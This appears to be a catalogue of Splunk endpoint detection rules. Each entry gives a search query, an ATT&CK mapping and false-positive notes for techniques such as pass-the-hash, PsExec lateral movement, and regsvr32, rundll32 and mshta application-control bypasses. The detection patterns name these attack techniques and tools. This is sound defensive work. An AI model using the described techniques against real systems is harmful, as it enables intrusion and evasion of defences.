`detect_oulook_exe_writing_a__zip_file_filter`

Associated Analytic Story


How To Implement

You must be ingesting data that records filesystem and process activity from your hosts to populate the Endpoint data model. This is typically populated via endpoint detection-and-response product, such as Carbon Black, or endpoint data sources, such as Sysmon.

Required field

ATT&CK

ID Technique Tactic
T1566.001 Spearphishing Attachment Initial Access


Kill Chain Phase

  • Installation
  • Actions on Objectives


Known False Positives

It is not uncommon for outlook to write legitimate zip files to the disk.

Reference

Test Dataset

version: 3


Detect pass the hash

This search looks for specific authentication events from the Windows Security Event logs to detect potential attempts using Pass-the-Hash technique.

  • Product: UEBA for Security Cloud
  • Datamodel:
  • ATT&CK: T1550.002
  • Last Updated: 2020-10-21

Search

| from read_ssa_enriched_events() | eval _time=map_get(input_event, "_time"), EventCode=map_get(input_event, "event_code"), LogonType=map_get(input_event, "logon_type"), LogonProcess=map_get(input_event, "logon_process"), ComputerName=map_get(input_event, "dest_ip_primary_artifact"), AccountName=map_get(input_event, "dest_user_primary_artifact") | where (LogonType="3" AND LogonProcess="NtLmSsp" AND AccountName IS NOT NULL) OR (LogonType="9" AND LogonProcess="seclogo") | first_time_event input_columns=["EventCode","LogonProcess","ComputerName"] | where first_time_EventCode_LogonProcess_ComputerName | eval start_time=_time, end_time=_time, body="TBD", entities="TBD" | select start_time, end_time, entities, body | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

The test data is converted from Windows Security Event logs generated from Attach Range simulation and used in SPL search and extended to SPL2

Required field

  • logon_process
  • dest_user_primary_artifact
  • _time
  • event_code
  • dest_ip_primary_artifact
  • logon_type


ATT&CK

ID Technique Tactic
T1550.002 Pass the Hash Defense Evasion, Lateral Movement


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Legitimate logon activity by authorized NTLM systems may be detected by this search. Please investigate as appropriate.

Reference

  • Initial ESCU implementation by Bhavin Patel and Patrick Bareiss


Test Dataset

version: 1


Detect path interception by creation of program exe

The detection Detect Path Interception By Creation Of program exe is detecting the abuse of unquoted service paths, which is a popular technique for privilege escalation.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1574.009
  • Last Updated: 2020-07-03

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name=services.exe by Processes.user Processes.process_name Processes.process Processes.dest index | `drop_dm_object_name(Processes)` | rex field=process "^.*?\\\\(?<service_process>[^\\\\]*\.(?:exe |bat |com |ps1))" | eval process_name = lower(process_name) | eval service_process = lower(service_process) | where process_name != service_process | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_path_interception_by_creation_of_program_exe_filter`

Associated Analytic Story


How To Implement

You must be ingesting data that records process activity from your hosts to populate the Endpoint data model in the Processes node. You must also be ingesting logs with both the process name and command line from your endpoints. The command-line arguments are mapped to the "process" field in the Endpoint data model.

Required field

ATT&CK

ID Technique Tactic
T1574.009 Path Interception by Unquoted Path Defense Evasion, Persistence, Privilege Escalation


Kill Chain Phase

  • Actions on Objectives


Known False Positives

unknown

Reference


Test Dataset


version: 3


Detect prohibited applications spawning cmd exe

This search looks for executions of cmd.exe spawned by a process that is often abused by attackers and that does not typically launch cmd.exe.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1059.003
  • Last Updated: 2020-11-10

Search

| tstats `security_content_summariesonly` count values(Processes.process) as process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=cmd.exe by Processes.parent_process_name Processes.process_name Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` |search [`prohibited_apps_launching_cmd`] | `detect_prohibited_applications_spawning_cmd_exe_filter`

Associated Analytic Story


How To Implement

You must be ingesting data that records process activity from your hosts and populates the Endpoint data model with the resultant dataset. This search includes a lookup file, `prohibited_apps_launching_cmd.csv`, that contains a list of processes that should not be spawning cmd.exe. You can modify this lookup to better suit your environment.

Required field

ATT&CK

ID Technique Tactic
T1059.003 Windows Command Shell Execution


Kill Chain Phase

  • Exploitation


Known False Positives

There are circumstances where an application may legitimately execute and interact with the Windows command-line interface. Investigate and modify the lookup file, as appropriate.

Reference

Test Dataset


version: 5


Detect prohibited applications spawning cmd exe

This search looks for executions of cmd.exe spawned by a process that is often abused by attackers and that does not typically launch cmd.exe. This is a SPL2 implementation of the rule `Detect Prohibited Applications Spawning cmd.exe` by @bpatel.

  • Product: UEBA for Security Cloud
  • Datamodel:
  • ATT&CK: T1059
  • Last Updated: 2020-7-13

Search

| from read_ssa_enriched_events() | eval timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)) | eval process_name=ucast(map_get(input_event, "process_name"), "string", null), parent_process=lower(ucast(map_get(input_event, "parent_process_name"), "string", null)), dest_user_id=ucast(map_get(input_event, "dest_user_id"), "string", null), dest_device_id=ucast(map_get(input_event, "dest_device_id"), "string", null) | where process_name="cmd.exe" | rex field=parent_process "(?<field0>[^\\\\]+)$" | where field0="winword.exe" OR field0="excel.exe" OR field0="outlook.exe" OR field0="powerpnt.exe" OR field0="visio.exe" OR field0="mspub.exe" OR field0="acrobat.exe" OR field0="acrord32.exe" OR field0="chrome.exe" OR field0="iexplore.exe" OR field0="opera.exe" OR field0="firefox.exe" OR field0="java.exe" OR field0="powershell.exe" | eval start_time=timestamp, end_time=timestamp, entities=mvappend(dest_device_id, dest_user_id), body="TBD" | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

You must be ingesting sysmon logs. This search has been modified to process raw sysmon data from attack_range's nxlogs on DSP.

Required field

  • process_name
  • parent_process_name
  • _time
  • dest_device_id
  • dest_user_id


ATT&CK

ID Technique Tactic
T1059 Command and Scripting Interpreter Execution


Kill Chain Phase

  • Exploitation


Known False Positives

There are circumstances where an application may legitimately execute and interact with the Windows command-line interface. Investigate and modify the lookup file, as appropriate.

Reference

Test Dataset

version: 1


Detect psexec with accepteula flag

This search looks for events where `PsExec.exe` is run with the `accepteula` flag in the command line. PsExec is a built-in Windows utility that enables you to execute processes on other systems. It is fully interactive for console applications. This tool is widely used for launching interactive command prompts on remote systems. Threat actors leverage this extensively for executing code on compromised systems. If an attacker is running PsExec for the first time, they will be prompted to accept the end-user license agreement (EULA), which can be passed as the argument `accepteula` within the command line.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1021.002
  • Last Updated: 2020-11-10

Search

| tstats `security_content_summariesonly` values(Processes.process) as process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process=*psexec* Processes.process=*accepteula* by Processes.process_name Processes.dest Processes.parent_process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_psexec_with_accepteula_flag_filter`

Associated Analytic Story


How To Implement

You must be ingesting data that records process activity from your hosts to populate the Endpoint data model in the Processes node. You must also be ingesting logs with both the process name and command line from your endpoints. The command-line arguments are mapped to the "process" field in the Endpoint data model.

Required field

ATT&CK

ID Technique Tactic
T1021.002 SMB/Windows Admin Shares Lateral Movement


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Administrators can leverage PsExec for accessing remote systems and might pass `accepteula` as an argument if they are running this tool for the first time. However, it is not likely that you'd see multiple occurrences of this event on a machine

Reference

Test Dataset


version: 3


Detect rare executables

This search will return a table of rare processes, the names of the systems running them, and the users who initiated each process.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK:
  • Last Updated: 2020-03-16

Search

| tstats `security_content_summariesonly` count values(Processes.dest) as dest values(Processes.user) as user min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes by Processes.process_name | rename Processes.process_name as process | rex field=user "(?<user_domain>.*)\\\\(?<user_name>.*)" | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | search [ | tstats count from datamodel=Endpoint.Processes by Processes.process_name | rare Processes.process_name limit=30 | rename Processes.process_name as process | `filter_rare_process_allow_list` | table process ] | `detect_rare_executables_filter`

Associated Analytic Story


How To Implement

To successfully implement this search, you must be ingesting data that records process activity from your hosts and populating the endpoint data model with the resultant dataset. The macro `filter_rare_process_allow_list` searches two lookup files for allowed processes. These consist of `rare_process_allow_list_default.csv` and `rare_process_allow_list_local.csv`. To add your own processes to the allow list, add them to `rare_process_allow_list_local.csv`. If you wish to remove an entry from the default lookup file, you will have to modify the macro itself to set the allow_list value for that process to false. You can modify the limit parameter and search scheduling to better suit your environment.

Required field

Kill Chain Phase

  • Installation
  • Command and Control
  • Actions on Objectives


Known False Positives

Some legitimate processes may be only rarely executed in your environment. As these are identified, update `rare_process_allow_list_local.csv` to filter them out of your search results.

Reference

Test Dataset

version: 5


Detect regasm spawning a process

The following analytic identifies regasm.exe spawning a process. This particular technique has been used in the wild to bypass application control products. Regasm.exe and Regsvcs.exe are signed by Microsoft. Spawning of a child process is rare from either process and should be investigated further. During investigation, identify and retrieve the content being loaded. Review parallel processes for additional suspicious behavior. Gather any other file modifications and review accordingly. regsvcs.exe and regasm.exe are natively found in C:\Windows\Microsoft.NET\Framework\v*\regasm|regsvcs.exe and C:\Windows\Microsoft.NET\Framework64\v*\regasm|regsvcs.exe.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1218.009
  • Last Updated: 2021-02-12

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name=regasm.exe by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_regasm_spawning_a_process_filter`

Associated Analytic Story


How To Implement

To successfully implement this search you need to be ingesting information on process that include the name of the process responsible for the changes from your endpoints into the `Endpoint` datamodel in the `Processes` node.

Required field

ATT&CK

ID Technique Tactic
T1218.009 Regsvcs/Regasm Defense Evasion


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Although unlikely, limited instances of regasm.exe or regsvcs.exe may cause a false positive. Filter based endpoint usage, command line arguments, or process lineage.

Reference


Test Dataset


version: 1


Detect regasm with network connection

The following analytic identifies regasm.exe with a network connection to a public IP address, exluding private IP space. This particular technique has been used in the wild to bypass application control products. Regasm.exe and Regsvcs.exe are signed by Microsoft. By contacting a remote command and control server, the adversary will have the ability to escalate privileges and complete the objectives. During investigation, identify and retrieve the content being loaded. Review parallel processes for additional suspicious behavior. Gather any other file modifications and review accordingly. Review the reputation of the remote IP or domain and block as needed. regsvcs.exe and regasm.exe are natively found in C:\Windows\Microsoft.NET\Framework\v*\regasm|regsvcs.exe and C:\Windows\Microsoft.NET\Framework64\v*\regasm|regsvcs.exe.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1218.009
  • Last Updated: 2021-02-16

Search

`sysmon` EventID=3 dest_ip!=10.0.0.0/12 dest_ip!=172.16.0.0/12 dest_ip!=192.168.0.0/16 process_name=regasm.exe | rename Computer as dest | stats count min(_time) as firstTime max(_time) as lastTime by dest, User, process_name, src_ip, dest_host, dest_ip | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_regasm_with_network_connection_filter`

Associated Analytic Story


How To Implement

To successfully implement this search, you need to be ingesting logs with the process name, parent process, and command-line executions from your endpoints. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA.

Required field

ATT&CK

ID Technique Tactic
T1218.009 Regsvcs/Regasm Defense Evasion


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Although unlikely, limited instances of regasm.exe with a network connection may cause a false positive. Filter based endpoint usage, command line arguments, or process lineage.

Reference


Test Dataset


version: 1


Detect regasm with no command line arguments

The following analytic identifies regasm.exe with no command line arguments. This particular behavior occurs when another process injects into regasm.exe, no command line arguments will be present. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. Regasm.exe are natively found in C:\Windows\Microsoft.NET\Framework\v*\regasm|regsvcs.exe and C:\Windows\Microsoft.NET\Framework64\v*\regasm|regsvcs.exe.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1218.009
  • Last Updated: 2021-02-12

Search

`sysmon` EventID=1 (process_name=regasm.exe OR OriginalFileName=RegAsm.exe) | regex CommandLine="(regasm\.exe.{0,4}$)" | stats count min(_time) as firstTime max(_time) as lastTime by dest, User, ParentImage,ParentCommandLine, process_name, OriginalFileName, process_path, CommandLine | rename Computer as dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_regasm_with_no_command_line_arguments_filter`

Associated Analytic Story


How To Implement

To successfully implement this search, you need to be ingesting logs with the process name, parent process, and command-line executions from your endpoints. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA.

Required field

ATT&CK

ID Technique Tactic
T1218.009 Regsvcs/Regasm Defense Evasion


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Although unlikely, limited instances of regasm.exe or may cause a false positive. Filter based endpoint usage, command line arguments, or process lineage.

Reference


Test Dataset


version: 1


Detect regsvcs spawning a process

The following analytic identifies regsvcs.exe spawning a process. This particular technique has been used in the wild to bypass application control products. Regasm.exe and Regsvcs.exe are signed by Microsoft. Spawning of a child process is rare from either process and should be investigated further. During investigation, identify and retrieve the content being loaded. Review parallel processes for additional suspicious behavior. Gather any other file modifications and review accordingly. regsvcs.exe and regasm.exe are natively found in C:\Windows\Microsoft.NET\Framework\v*\regasm|regsvcs.exe and C:\Windows\Microsoft.NET\Framework64\v*\regasm|regsvcs.exe.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1218.009
  • Last Updated: 2021-02-12

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name=regsvcs.exe by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_regsvcs_spawning_a_process_filter`

Associated Analytic Story


How To Implement

To successfully implement this search you need to be ingesting information on process that include the name of the process responsible for the changes from your endpoints into the `Endpoint` datamodel in the `Processes` node.

Required field

ATT&CK

ID Technique Tactic
T1218.009 Regsvcs/Regasm Defense Evasion


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Although unlikely, limited instances of regasm.exe or regsvcs.exe may cause a false positive. Filter based endpoint usage, command line arguments, or process lineage.

Reference


Test Dataset


version: 1


Detect regsvcs with network connection

The following analytic identifies Regsvcs.exe with a network connection to a public IP address, exluding private IP space. This particular technique has been used in the wild to bypass application control products. Regasm.exe and Regsvcs.exe are signed by Microsoft. By contacting a remote command and control server, the adversary will have the ability to escalate privileges and complete the objectives. During investigation, identify and retrieve the content being loaded. Review parallel processes for additional suspicious behavior. Gather any other file modifications and review accordingly. Review the reputation of the remote IP or domain and block as needed. regsvcs.exe and regasm.exe are natively found in C:\Windows\Microsoft.NET\Framework\v*\regasm|regsvcs.exe and C:\Windows\Microsoft.NET\Framework64\v*\regasm|regsvcs.exe.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1218.009
  • Last Updated: 2021-02-16

Search

`sysmon` EventID=3 dest_ip!=10.0.0.0/12 dest_ip!=172.16.0.0/12 dest_ip!=192.168.0.0/16 process_name=regsvcs.exe | rename Computer as dest | stats count min(_time) as firstTime max(_time) as lastTime by dest, User, process_name, src_ip, dest_host, dest_ip | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_regsvcs_with_network_connection_filter`

Associated Analytic Story


How To Implement

To successfully implement this search, you need to be ingesting logs with the process name, parent process, and command-line executions from your endpoints. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA.

Required field

ATT&CK

ID Technique Tactic
T1218.009 Regsvcs/Regasm Defense Evasion


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Although unlikely, limited instances of regsvcs.exe may cause a false positive. Filter based endpoint usage, command line arguments, or process lineage.

Reference


Test Dataset


version: 1


Detect regsvcs with no command line arguments

The following analytic identifies regsvcs.exe with no command line arguments. This particular behavior occurs when another process injects into regsvcs.exe, no command line arguments will be present. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. Regasm.exe are natively found in C:\Windows\Microsoft.NET\Framework\v*\regasm|regsvcs.exe and C:\Windows\Microsoft.NET\Framework64\v*\regasm|regsvcs.exe.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1218.009
  • Last Updated: 2021-02-12

Search

`sysmon` EventID=1 (process_name=regsvcs.exe OR OriginalFileName=RegSvcs.exe) | regex CommandLine="(regsvcs\.exe.{0,4}$)" | stats count min(_time) as firstTime max(_time) as lastTime by dest, User, ParentImage,ParentCommandLine, process_name, OriginalFileName, process_path, CommandLine | rename Computer as dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_regsvcs_with_no_command_line_arguments_filter`

Associated Analytic Story


How To Implement

To successfully implement this search, you need to be ingesting logs with the process name, parent process, and command-line executions from your endpoints. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA.

Required field

ATT&CK

ID Technique Tactic
T1218.009 Regsvcs/Regasm Defense Evasion


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Although unlikely, limited instances of regsvcs.exe may cause a false positive. Filter based endpoint usage, command line arguments, or process lineage.

Reference


Test Dataset


version: 1


Detect regsvr32 application control bypass

Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary.This variation of the technique is often referred to as a "Squiblydoo" attack. \ Upon investigating, look for network connections to remote destinations (internal or external). Be cautious to modify the query to look for "scrobj.dll", the ".dll" is not required to load scrobj. "scrobj.dll" will be loaded by "regsvr32.exe" upon execution.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1218.010
  • Last Updated: 2021-01-28

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name=regsvr32.exe OR Processes.process_name!=regsvr32.exe) Processes.process=*scrobj* by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_regsvr32_application_control_bypass_filter`

Associated Analytic Story


How To Implement

You must be ingesting endpoint data that tracks process activity, including parent-child relationships from your endpoints, to populate the Endpoint data model in the Processes node. The command-line arguments are mapped to the "process" field in the Endpoint data model. Tune the query by modifying/removing the !=regsv32.exe.

Required field

ATT&CK

ID Technique Tactic
T1218.010 Regsvr32 Defense Evasion


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Limited false positives related to third party software registering .DLL's.

Reference


Test Dataset


version: 1


Detect rundll32 application control bypass - advpack

The following analytic identifies rundll32.exe loading advpack.dll and ieadvpack.dll by calling the LaunchINFSection function on the command line. This particular technique will load script code from a file. Upon a successful execution, the following module loads may occur - clr.dll, jscript.dll and scrobj.dll. During investigation, identify script content origination. Generally, a child process will spawn from rundll32.exe, but that may be bypassed based on script code contents. Rundll32.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. During investigation, review any network connections and obtain the script content executed. It's possible other files are on disk.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1218.011
  • Last Updated: 2021-02-04

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=rundll32.exe Processes.process=*advpack* by Processes.user Processes.process_name Processes.process Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_rundll32_application_control_bypass___advpack_filter`

Associated Analytic Story


How To Implement

To successfully implement this search you need to be ingesting information on process that include the name of the process responsible for the changes from your endpoints into the `Endpoint` datamodel in the `Processes` node.

Required field

ATT&CK

ID Technique Tactic
T1218.011 Rundll32 Defense Evasion


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Although unlikely, some legitimate applications may use advpack.dll or ieadvpack.dll, triggering a false positive.

Reference


Test Dataset


version: 1


Detect rundll32 application control bypass - setupapi

The following analytic identifies rundll32.exe loading setupapi.dll and iesetupapi.dll by calling the LaunchINFSection function on the command line. This particular technique will load script code from a file. Upon a successful execution, the following module loads may occur - clr.dll, jscript.dll and scrobj.dll. During investigation, identify script content origination. Generally, a child process will spawn from rundll32.exe, but that may be bypassed based on script code contents. Rundll32.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. During investigation, review any network connections and obtain the script content executed. It's possible other files are on disk.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1218.011
  • Last Updated: 2021-02-04

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=rundll32.exe Processes.process=*setupapi* by Processes.user Processes.process_name Processes.process Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_rundll32_application_control_bypass___setupapi_filter`

Associated Analytic Story


How To Implement

To successfully implement this search you need to be ingesting information on process that include the name of the process responsible for the changes from your endpoints into the `Endpoint` datamodel in the `Processes` node.

Required field

ATT&CK

ID Technique Tactic
T1218.011 Rundll32 Defense Evasion


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Although unlikely, some legitimate applications may use setupapi triggering a false positive.

Reference


Test Dataset


version: 1


Detect rundll32 application control bypass - syssetup

The following analytic identifies rundll32.exe loading syssetup.dll by calling the LaunchINFSection function on the command line. This particular technique will load script code from a file. Upon a successful execution, the following module loads may occur - clr.dll, jscript.dll and scrobj.dll. During investigation, identify script content origination. Generally, a child process will spawn from rundll32.exe, but that may be bypassed based on script code contents. Rundll32.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. During investigation, review any network connections and obtain the script content executed. It's possible other files are on disk.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1218.011
  • Last Updated: 2021-02-04

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=rundll32.exe Processes.process=*syssetup* by Processes.user Processes.process_name Processes.process Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_rundll32_application_control_bypass___syssetup_filter`

Associated Analytic Story


How To Implement

To successfully implement this search you need to be ingesting information on process that include the name of the process responsible for the changes from your endpoints into the `Endpoint` datamodel in the `Processes` node.

Required field

ATT&CK

ID Technique Tactic
T1218.011 Rundll32 Defense Evasion


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Although unlikely, some legitimate applications may use syssetup.dll, triggering a false positive.

Reference


Test Dataset


version: 1


Detect rundll32 inline hta execution

The following analytic identifies "rundll32.exe" execution with inline protocol handlers. "JavaScript", "VBScript", and "About" are the only supported options when invoking HTA content directly on the command-line. This type of behavior is commonly observed with fileless malware or application whitelisting bypass techniques. The search will return the first time and last time these command-line arguments were used for these executions, as well as the target system, the user, process "rundll32.exe" and its parent process.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1218.005
  • Last Updated: 2021-01-20

Search

| tstats `security_content_summariesonly` count values(Processes.process) as process values(Processes.parent_process) as parent_process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=rundll32.exe (Processes.process=*vbscript* OR Processes.process=*javascript* OR Processes.process=*about*) by Processes.user Processes.process_name Processes.parent_process_name Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_rundll32_inline_hta_execution_filter`

Associated Analytic Story


How To Implement

To successfully implement this search you need to be ingesting information on process that include the name of the process responsible for the changes from your endpoints into the `Endpoint` datamodel in the `Processes` node.

Required field

ATT&CK

ID Technique Tactic
T1218.005 Mshta Defense Evasion


Kill Chain Phase

  • Exploitation


Known False Positives

Although unlikely, some legitimate applications may exhibit this behavior, triggering a false positive.

Reference


Test Dataset


version: 1


Detect use of cmd exe to launch script interpreters

This search looks for the execution of the cscript.exe or wscript.exe processes, with a parent of cmd.exe. The search will return the count, the first and last time this execution was seen on a machine, the user, and the destination of the machine

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1059.003
  • Last Updated: 2020-07-21

Search

| tstats `security_content_summariesonly` count values(Processes.process) min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name="cmd.exe" (Processes.process_name=cscript.exe OR Processes.process_name =wscript.exe) by Processes.parent_process Processes.process_name Processes.user Processes.dest | `drop_dm_object_name("Processes")` | `security_content_ctime(firstTime)` |`security_content_ctime(lastTime)` | `detect_use_of_cmd_exe_to_launch_script_interpreters_filter`

Associated Analytic Story


How To Implement

To successfully implement this search, you must be ingesting data that records process activity from your hosts to populate the endpoint data model in the processes node. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA.

Required field

ATT&CK

ID Technique Tactic
T1059.003 Windows Command Shell Execution


Kill Chain Phase

  • Exploitation


Known False Positives

Some legitimate applications may exhibit this behavior.

Reference

Test Dataset


version: 4


Detect mshta inline hta execution

The following analytic identifies "mshta.exe" execution with inline protocol handlers. "JavaScript", "VBScript", and "About" are the only supported options when invoking HTA content directly on the command-line. The search will return the first time and last time these command-line arguments were used for these executions, as well as the target system, the user, process "mshta.exe" and its parent process.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1218.005
  • Last Updated: 2021-01-20

Search

| tstats `security_content_summariesonly` count values(Processes.process) as process values(Processes.parent_process) as parent_process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=mshta.exe (Processes.process=*vbscript* OR Processes.process=*javascript* OR Processes.process=*about*) by Processes.user Processes.process_name Processes.parent_process_name Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_mshta_inline_hta_execution_filter`

Associated Analytic Story


How To Implement

To successfully implement this search you need to be ingesting information on process that include the name of the process responsible for the changes from your endpoints into the `Endpoint` datamodel in the `Processes` node.

Required field

ATT&CK

ID Technique Tactic
T1218.005 Mshta Defense Evasion


Kill Chain Phase

  • Exploitation


Known False Positives

Although unlikely, some legitimate applications may exhibit this behavior, triggering a false positive.

Reference


Test Dataset


version: 5


Detect mshta renamed

The following analytic identifies renamed instances of mshta.exe executing. Mshta.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. This analytic utilizes the internal name of the PE to identify if is the legitimate mshta binary. Further analysis should be performed to review the executed content and validation it is the real mshta.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1218.005
  • Last Updated: 2021-01-20

Search

`sysmon` EventID=1 (OriginalFileName=mshta.exe AND process_name!=mshta.exe) | stats count min(_time) as firstTime max(_time) as lastTime by Computer, User, parent_process_name, process_name, OriginalFileName, process_path, CommandLine | rename Computer as dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_mshta_renamed_filter`

Associated Analytic Story


How To Implement

To successfully implement this search, you need to be ingesting logs with the process name, parent process, and command-line executions from your endpoints. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA.

Required field

ATT&CK

ID Technique Tactic
T1218.005 Mshta Defense Evasion


Kill Chain Phase

  • Exploitation


Known False Positives

Although unlikely, some legitimate applications may use a moved copy of mshta.exe, but never renamed, triggering a false positive.

Reference


Test Dataset


version: 1


Detect processes used for system network configuration discovery

This search looks for fast execution of processes used for system network configuration discovery on the endpoint.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1016
  • Last Updated: 2020-11-10

Search

| tstats `security_content_summariesonly` count values(Processes.process) as process values(Processes.parent_process) as parent_process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes by Processes.dest Processes.process_name Processes.user _time | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `drop_dm_object_name(Processes)` | search `system_network_configuration_discovery_tools` | transaction dest connected=false maxpause=5m |where eventcount>=5 | table firstTime lastTime dest user process_name process parent_process eventcount | `detect_processes_used_for_system_network_configuration_discovery_filter`

Associated Analytic Story


How To Implement

You must be ingesting data that records registry activity from your hosts to populate the Endpoint data model in the processes node. This is typically populated via endpoint detection-and-response product, such as Carbon Black, or endpoint data sources, such as Sysmon. The data used for this search is usually generated via logs that report reads and writes to the registry or that are populated via Windows event logs, after enabling process tracking in your Windows audit settings.

Required field

ATT&CK

ID Technique Tactic
T1016 System Network Configuration Discovery Discovery


Kill Chain Phase

  • Installation
  • Command and Control
  • Actions on Objectives


Known False Positives

It is uncommon for normal users to execute a series of commands used for network discovery. System administrators often use scripts to execute these commands. These can generate false positives.

Reference

Test Dataset


version: 2
